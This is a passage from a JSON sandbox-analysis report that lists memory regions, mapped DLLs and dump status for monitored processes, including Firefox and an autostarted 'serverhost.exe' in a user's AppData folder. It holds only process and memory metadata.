}, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 778240, "start_va": 1833500672, "type": "region", "version": 1 }, "end_va": 1834278911, "entry_point": 1833500672, "filename": "\\Program Files\\Mozilla Firefox\\msvcr100.dll", "id": "region_2101", "name": "msvcr100.dll", "norm_filename": "c:\\program files\\mozilla firefox\\msvcr100.dll", "region_type": "memory_mapped_file", "start_va": 1833500672, "timestamp": "00:01:26.918", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 139264, "start_va": 1865285632, "type": "region", "version": 1 }, "end_va": 1865424895, "entry_point": 1865285632, "filename": "\\Program Files\\Mozilla Firefox\\mozglue.dll", "id": "region_2102", "name": "mozglue.dll", "norm_filename": "c:\\program files\\mozilla firefox\\mozglue.dll", "region_type": "memory_mapped_file", "start_va": 1865285632, "timestamp": "00:01:26.957", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 1864826880, "type": "region", "version": 1 }, "end_va": 1865256959, "entry_point": 1864826880, "filename": "\\Program Files\\Mozilla Firefox\\msvcp100.dll", "id": "region_2103", "name": "msvcp100.dll", "norm_filename": "c:\\program files\\mozilla firefox\\msvcp100.dll", "region_type": "memory_mapped_file", "start_va": 1864826880, "timestamp": "00:01:27.041", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 917504, "start_va": 11927552, "type": "region", "version": 1 }, "end_va": 12845055, "entry_point": 0, "filename": null, "id": "region_2104", "name": "private_0x0000000000b60000", "norm_filename": null, "region_type": "private_memory", "start_va": 11927552, "timestamp": "00:01:27.081", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1179648, "start_va": 25559040, "type": "region", "version": 1 }, "end_va": 26738687, "entry_point": 0, "filename": null, "id": "region_2109", "name": "private_0x0000000001860000", "norm_filename": null, "region_type": "private_memory", "start_va": 25559040, "timestamp": "00:01:27.112", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 25559040, "type": "region", "version": 1 }, "end_va": 26607615, "entry_point": 0, "filename": null, "id": "region_2114", "name": "private_0x0000000001860000", "norm_filename": null, "region_type": "private_memory", "start_va": 25559040, "timestamp": "00:01:27.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 26673152, "type": "region", "version": 1 }, "end_va": 26738687, "entry_point": 0, "filename": null, "id": "region_2115", "name": "private_0x0000000001970000", "norm_filename": null, "region_type": "private_memory", "start_va": 26673152, "timestamp": "00:01:27.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 26738688, "type": "region", "version": 1 }, "end_va": 27787263, "entry_point": 0, "filename": null, "id": "region_2124", "name": "private_0x0000000001980000", "norm_filename": null, "region_type": "private_memory", "start_va": 26738688, "timestamp": "00:01:27.319", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 27262976, "type": "region", "version": 1 }, "end_va": 28311551, "entry_point": 0, "filename": null, "id": "region_2125", "name": "private_0x0000000001a00000", "norm_filename": null, "region_type": "private_memory", "start_va": 27262976, "timestamp": "00:01:27.319", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1866792960, "type": "region", "version": 1 }, "end_va": 1866952703, "entry_point": 1866792960, "filename": "\\Program Files\\Mozilla Firefox\\softokn3.dll", "id": "region_2126", "name": "softokn3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\softokn3.dll", "region_type": "memory_mapped_file", "start_va": 1866792960, "timestamp": "00:01:27.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1866661888, "type": "region", "version": 1 }, "end_va": 1866756095, "entry_point": 1866661888, "filename": "\\Program Files\\Mozilla Firefox\\nssdbm3.dll", "id": "region_2127", "name": "nssdbm3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\nssdbm3.dll", "region_type": "memory_mapped_file", "start_va": 1866661888, "timestamp": "00:01:27.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3870719, "entry_point": 3866624, "filename": "\\Windows\\System32\\tzres.dll", "id": "region_2128", "name": "tzres.dll", "norm_filename": "c:\\windows\\system32\\tzres.dll", "region_type": "memory_mapped_file", "start_va": 3866624, "timestamp": "00:01:27.554", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3960831, "entry_point": 0, "filename": null, "id": "region_2129", "name": "pagefile_0x00000000003c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3932160, "timestamp": "00:01:27.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4005887, "entry_point": 0, "filename": null, "id": "region_2130", "name": "pagefile_0x00000000003d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3997696, "timestamp": "00:01:27.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 28311552, "type": "region", "version": 1 }, "end_va": 32452607, "entry_point": 0, "filename": null, "id": "region_2131", "name": "pagefile_0x0000000001b00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 28311552, "timestamp": "00:01:27.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, "start_va": 1866334208, "type": "region", "version": 1 }, "end_va": 1866657791, "entry_point": 1866334208, "filename": "\\Program Files\\Mozilla Firefox\\freebl3.dll", "id": "region_2133", "name": "freebl3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\freebl3.dll", "region_type": "memory_mapped_file", "start_va": 1866334208, "timestamp": "00:01:27.585", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1866596352, "type": "region", "version": 1 }, "end_va": 1866756095, "entry_point": 1866712457, "filename": "\\Program Files\\Mozilla Firefox\\softokn3.dll", "id": "region_2134", "name": "softokn3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\softokn3.dll", "region_type": "memory_mapped_file", "start_va": 1866596352, "timestamp": "00:01:27.679", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1866858496, "type": "region", "version": 1 }, "end_va": 1866952703, "entry_point": 1866930848, "filename": "\\Program Files\\Mozilla Firefox\\nssdbm3.dll", "id": "region_2135", "name": "nssdbm3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\nssdbm3.dll", "region_type": "memory_mapped_file", "start_va": 1866858496, "timestamp": "00:01:27.681", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, "start_va": 1866268672, "type": "region", "version": 1 }, "end_va": 1866592255, "entry_point": 1866490882, "filename": "\\Program Files\\Mozilla Firefox\\freebl3.dll", "id": "region_2136", "name": "freebl3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\freebl3.dll", "region_type": "memory_mapped_file", "start_va": 1866268672, "timestamp": "00:01:27.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_2137", "name": "private_0x00000000003b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3866624, "timestamp": "00:01:27.696", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4161535, "entry_point": 0, "filename": null, "id": "region_2138", "name": "pagefile_0x00000000003f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4128768, "timestamp": "00:01:27.697", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3899391, "entry_point": 0, "filename": null, "id": "region_2139", "name": "pagefile_0x00000000003b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3866624, "timestamp": "00:01:27.698", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 2000617472, "type": "region", "version": 1 }, "end_va": 2000637951, "entry_point": 2000622648, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_2160", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2000617472, "timestamp": "00:01:27.712", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" ", "filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe", "id": "proc_15", "image_name": "serverhost.exe", "monitor_reason": "autostart", "monitored_id": 15, "origin_monitor_id": 0, "ref_parent_process": null, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2345", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:50.102", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_2346", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:50.102", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 3080191, "entry_point": 0, "filename": null, "id": "region_2347", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:01:50.102", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 10354688, "type": "region", "version": 1 }, "end_va": 10465279, "entry_point": 10354688, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", "id": "region_2348", "name": "serverhost.exe", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe", "region_type": "memory_mapped_file", "start_va": 10354688, "timestamp": "00:01:50.103", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1995374592, "type": "region", "version": 1 }, "end_va": 1996668927, "entry_point": 1995374592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2349", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1995374592, "timestamp": "00:01:50.110", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997737983, "entry_point": 1997733888, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2350", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:50.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_2351", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:01:50.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147303424, "type": "region", "version": 1 }, "end_va": 2147307519, "entry_point": 0, "filename": null, "id": "region_2352", "name": "private_0x000000007ffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147303424, "timestamp": "00:01:50.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2353", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:50.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 5832703, "entry_point": 0, "filename": null, "id": "region_2354", "name": "private_0x0000000000490000", "norm_filename": null, "region_type": "private_memory", "start_va": 4784128, "timestamp": "00:01:50.594", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1964638208, "type": "region", "version": 1 }, "end_va": 1964941311, "entry_point": 1964638208, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_2355", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1964638208, "timestamp": "00:01:50.594", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1984954368, "type": "region", "version": 1 }, "end_va": 1985822719, "entry_point": 1984954368, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_2356", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1984954368, "timestamp": "00:01:50.639", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2357", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:50.834", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 684031, "entry_point": 262144, "filename": "\\Windows\\System32\\locale.nls", "id": "region_2358", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:50.835", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 540672, "start_va": 1907884032, "type": "region", "version": 1 }, "end_va": 1908424703, "entry_point": 1907884032, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_2359", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1907884032, "timestamp": "00:01:50.835", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1964310528, "type": "region", "version": 1 }, "end_va": 1964384255, "entry_point": 1964310528, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_2360", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1964310528, "timestamp": "00:01:50.885", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1966145536, "type": "region", "version": 1 }, "end_va": 1966305279, "entry_point": 1966145536, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_2361", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 1966145536, "timestamp": "00:01:50.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1966342144, "type": "region", "version": 1 }, "end_va": 1966997503, "entry_point": 1966342144, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_2362", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1966342144, "timestamp": "00:01:50.898", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1966997504, "type": "region", "version": 1 }, "end_va": 1967583231, "entry_point": 1966997504, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_2363", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1966997504, "timestamp": "00:01:50.956", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1968111616, "type": "region", "version": 1 }, "end_va": 1968771071, "entry_point": 1968111616, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_2364", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1968111616, "timestamp": "00:01:50.965", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1969881088, "type": "region", "version": 1 }, "end_va": 1970524159, "entry_point": 1969881088, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_2365", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1969881088, "timestamp": "00:01:50.972", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1970536448, "type": "region", "version": 1 }, "end_va": 1983422463, "entry_point": 1970536448, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_2366", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1970536448, "timestamp": "00:01:50.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1988100096, "type": "region", "version": 1 }, "end_va": 1989525503, "entry_point": 1988100096, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_2367", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1988100096, "timestamp": "00:01:51.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1992032256, "type": "region", "version": 1 }, "end_va": 1992073215, "entry_point": 1992032256, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_2368", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1992032256, "timestamp": "00:01:51.905", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1992097792, "type": "region", "version": 1 }, "end_va": 1992921087, "entry_point": 1992097792, "filename": "\\Windows\\System32\\user32.dll", "id": "region_2369", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1992097792, "timestamp": "00:01:51.910", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1992949760, "type": "region", "version": 1 }, "end_va": 1994641407, "entry_point": 1992949760, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_2370", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1992949760, "timestamp": "00:01:51.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1994653696, "type": "region", "version": 1 }, "end_va": 1995358207, "entry_point": 1994653696, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_2371", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1994653696, "timestamp": "00:01:51.963", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1996685312, "type": "region", "version": 1 }, "end_va": 1996787711, "entry_point": 1996685312, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_2372", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1996685312, "timestamp": "00:01:51.974", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1996881920, "type": "region", "version": 1 }, "end_va": 1997238271, "entry_point": 1996881920, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_2373", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1996881920, "timestamp": "00:01:51.979", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1997340672, "type": "region", "version": 1 }, "end_va": 1997660159, "entry_point": 1997340672, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_2374", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1997340672, "timestamp": "00:01:52.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_2375", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:52.075", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 1540095, "entry_point": 0, "filename": null, "id": "region_2376", "name": "pagefile_0x00000000000b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 720896, "timestamp": "00:01:52.205", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 7667712, "type": "region", "version": 1 }, "end_va": 7733247, "entry_point": 0, "filename": null, "id": "region_2377", "name": "private_0x0000000000750000", "norm_filename": null, "region_type": "private_memory", "start_va": 7667712, "timestamp": "00:01:52.205", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1983447040, "type": "region", "version": 1 }, "end_va": 1984282623, "entry_point": 1983447040, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_2378", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1983447040, "timestamp": "00:01:52.205", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988095999, "entry_point": 1987969024, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_2379", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:52.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, 